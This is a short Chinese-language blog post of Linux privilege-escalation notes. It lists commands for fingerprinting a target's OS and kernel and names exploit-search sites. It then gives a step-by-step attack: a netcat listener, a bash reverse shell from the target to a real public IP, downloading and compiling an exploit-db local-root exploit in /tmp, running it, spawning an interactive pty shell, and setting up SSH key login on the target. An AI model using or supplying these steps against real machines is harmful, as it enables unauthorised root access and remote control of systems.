Linux提权

Posted on 周五 27 二月 2015 in misc

struts2 漏洞 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html

java反序列化漏洞 https://blog.chaitin.com/2015-11-11_java_unserialize_rce/?from=timeline&isappinstalled=0

获取操作系统版本号

获取发行版本

• cat /etc/issue
• cat /etc/*-release
• cat /etc/lsb-release
• cat /etc/redhat-release


*CentOS Linux release 7.0.1406 (Core)

获取内核版本

• cat /proc/version
• uname -a
• uname -mrs
• rpm -q kernel
• dmesg | grep Linux
• ls /boot | grep vmlinuz


Linux version 3.10.0-123.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.2 20140120 (Red Hat 4.8.2-16) (GCC) ) #1 SMP Mon Jun 30 12:09:22 UTC 2014

搜索exp

• http://www.exploit-db.com
• http://1337day.com
• http://www.securiteam.com
• http://www.securityfocus.com
• http://www.exploitsearch.net
• http://metasploit.com/modules/
• http://securityreason.com
• http://seclists.org/fulldisclosure/
• http://www.google.com

http://www.exploit-db.com 墙
搜索关键字 **CentOS  7 local root**


https://www.exploit-db.com/download/35370

本地
nc -l 8088


目标机 
>/bin/bash -i >& /dev/tcp/115.159.101.141/8088 0<&1

下载exp.c

```bash
cd /tmp
curl https://www.exploit-db.com/download/35370 > exp.c
```

gcc编译exp.c

gcc exp.c -o exploit -lpthread


./exploit
回车


id

交互式的bash

python -c 'import pty; pty.spawn("/bin/bash")'

ssh免密码登录

A免密码登录B

  • A 生成公钥私钥 ssh-keygen -t rsa
    • ~/.ssh/id_rsa
    • ~/.ssh/id_rsa.pub
  • 将 ~/.ssh/id_rsa.pub 中内容复制到B ~/.ssh/authorized_keys 中

注意事项

  • B ~/.ssh/ 文件夹权限 700
    • chmod 700 .ssh
  • B ~/.ssh/authorzied_keys 文件权限 600
    • chmod 600 .ssh/authorized_keys
  • 且上两个文件属主必须是当前用户

linux